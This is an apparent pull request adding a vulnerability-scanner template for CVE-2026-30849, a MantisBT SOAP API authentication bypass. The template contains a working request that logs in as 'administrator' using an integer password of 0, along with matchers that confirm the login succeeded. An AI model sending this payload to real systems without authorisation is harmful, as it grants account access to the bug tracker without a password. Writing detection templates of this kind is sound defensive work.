### PR TITLE
Add CVE-2026-30849 template

### DIFF
--- a/http/cves/2026/CVE-2026-30849.yaml
+++ b/http/cves/2026/CVE-2026-30849.yaml
@@ -1,35 +1,32 @@
 id: CVE-2026-30849
 
 info:
-  name: MantisBT - SOAP API Authentication Bypass
+  name: MantisBT < 2.28.1 - SOAP API Authentication Bypass
   author: str4k3r
   severity: critical
-  description: >
-    MantisBT installations using MySQL or a compatible database accept an
-    integer SOAP password value without type enforcement. MySQL's implicit
-    conversion can make the crafted value match a cookie row, allowing an
-    unauthenticated caller who knows a username to obtain a SOAP session
-    without its password. The probe only invokes the login method and does
-    not call any authenticated API operation.
+  description: |
+    Mantis Bug Tracker \u003C 2.28.1 on MySQL databases contains an authentication bypass caused by improper type checking on the password parameter in the SOAP API, letting attackers login without the actual password using a crafted SOAP envelope, exploit requires knowing the victim's username.
+  impact: |
+    Attackers can bypass authentication to access victim accounts and execute API functions, potentially compromising user data and system integrity.
+  remediation: |
+    Upgrade to version 2.28.1 or later; disabling the SOAP API reduces risk.
   reference:
-    - https://github.com/mantisbt/mantisbt/security/advisories/GHSA-phrq-pc6r-f6gh
-    - https://github.com/mantisbt/mantisbt/commit/b349e5c890eeda9bd82e7c7e14479853f8a30d9f
     - https://nvd.nist.gov/vuln/detail/CVE-2026-30849
+    - https://github.com/mantisbt/mantisbt/security/advisories/GHSA-phrq-pc6r-f6gh
+    - https://mantisbt.org/bugs/view.php?id=36902
   classification:
     cve-id: CVE-2026-30849
     cwe-id: CWE-843
-    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N
     cvss-score: 9.3
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
   metadata:
     verified: true
     max-request: 1
     vendor: mantisbt
     product: mantisbt
-    technology: php, soap, mysql
-  tags: cve,cve2026,mantisbt,soap,auth-bypass,type-juggling,mysql
-
-variables:
-  username: administrator
+    shodan-query: http.title:"MantisBT"
+    fofa-query: title="MantisBT"
+  tags: cve,cve2026,mantisbt,soap,auth-bypass,type-confusion,mysql,unauth
 
 http:
   - raw:
@@ -43,19 +40,15 @@ http:
         <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
           <SOAP-ENV:Body>
             <ns1:mc_login xmlns:ns1="http://futureware.biz/mantisconnect" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
-              <username xsi:type="xsd:string">{{username}}</username>
+              <username xsi:type="xsd:string">administrator</username>
               <password xsi:type="xsd:int">0</password>
             </ns1:mc_login>
           </SOAP-ENV:Body>
         </SOAP-ENV:Envelope>
-    matchers-condition: and
+
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: body
-        words:
-          - "mc_loginResponse"
-          - "access_level"
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_all(body, "mc_loginResponse", "access_level")'
         condition: and

--- a/http/cves/2026/CVE-2026-30849.yaml
+++ b/http/cves/2026/CVE-2026-30849.yaml
@@ -1,0 +1,61 @@
+id: CVE-2026-30849
+
+info:
+  name: MantisBT - SOAP API Authentication Bypass
+  author: str4k3r
+  severity: critical
+  description: >
+    MantisBT installations using MySQL or a compatible database accept an
+    integer SOAP password value without type enforcement. MySQL's implicit
+    conversion can make the crafted value match a cookie row, allowing an
+    unauthenticated caller who knows a username to obtain a SOAP session
+    without its password. The probe only invokes the login method and does
+    not call any authenticated API operation.
+  reference:
+    - https://github.com/mantisbt/mantisbt/security/advisories/GHSA-phrq-pc6r-f6gh
+    - https://github.com/mantisbt/mantisbt/commit/b349e5c890eeda9bd82e7c7e14479853f8a30d9f
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-30849
+  classification:
+    cve-id: CVE-2026-30849
+    cwe-id: CWE-843
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N
+    cvss-score: 9.3
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: mantisbt
+    product: mantisbt
+    technology: php, soap, mysql
+  tags: cve,cve2026,mantisbt,soap,auth-bypass,type-juggling,mysql
+
+variables:
+  username: administrator
+
+http:
+  - raw:
+      - |
+        POST /api/soap/mantisconnect.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml; charset=utf-8
+        SOAPAction: "http://www.mantisbt.org/bugs/api/soap/mantisconnect.php/mc_login"
+
+        <?xml version="1.0" encoding="UTF-8"?>
+        <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
+          <SOAP-ENV:Body>
+            <ns1:mc_login xmlns:ns1="http://futureware.biz/mantisconnect" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+              <username xsi:type="xsd:string">{{username}}</username>
+              <password xsi:type="xsd:int">0</password>
+            </ns1:mc_login>
+          </SOAP-ENV:Body>
+        </SOAP-ENV:Envelope>
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "mc_loginResponse"
+          - "access_level"
+        condition: and

--- a/http/cves/2026/CVE-2026-30849.yaml
+++ b/http/cves/2026/CVE-2026-30849.yaml
@@ -5,7 +5,7 @@ info:
   author: str4k3r
   severity: critical
   description: |
-    Mantis Bug Tracker \u003C 2.28.1 on MySQL databases contains an authentication bypass caused by improper type checking on the password parameter in the SOAP API, letting attackers login without the actual password using a crafted SOAP envelope, exploit requires knowing the victim's username.
+    Mantis Bug Tracker < 2.28.1 on MySQL databases contains an authentication bypass caused by improper type checking on the password parameter in the SOAP API, letting attackers login without the actual password using a crafted SOAP envelope, exploit requires knowing the victim's username.
   impact: |
     Attackers can bypass authentication to access victim accounts and execute API functions, potentially compromising user data and system integrity.
   remediation: |


### PR DESCRIPTION
## Verification

This template sends the public MantisBT SOAP proof of concept with an integer
password type and checks for a successful SOAP login response containing the
access level. It uses only the login call, does not invoke a project or admin
operation after authentication, and requires no password.

The vendor advisory documents the MySQL-specific type-conversion behavior and
the patched commit:
https://github.com/mantisbt/mantisbt/security/advisories/GHSA-phrq-pc6r-f6gh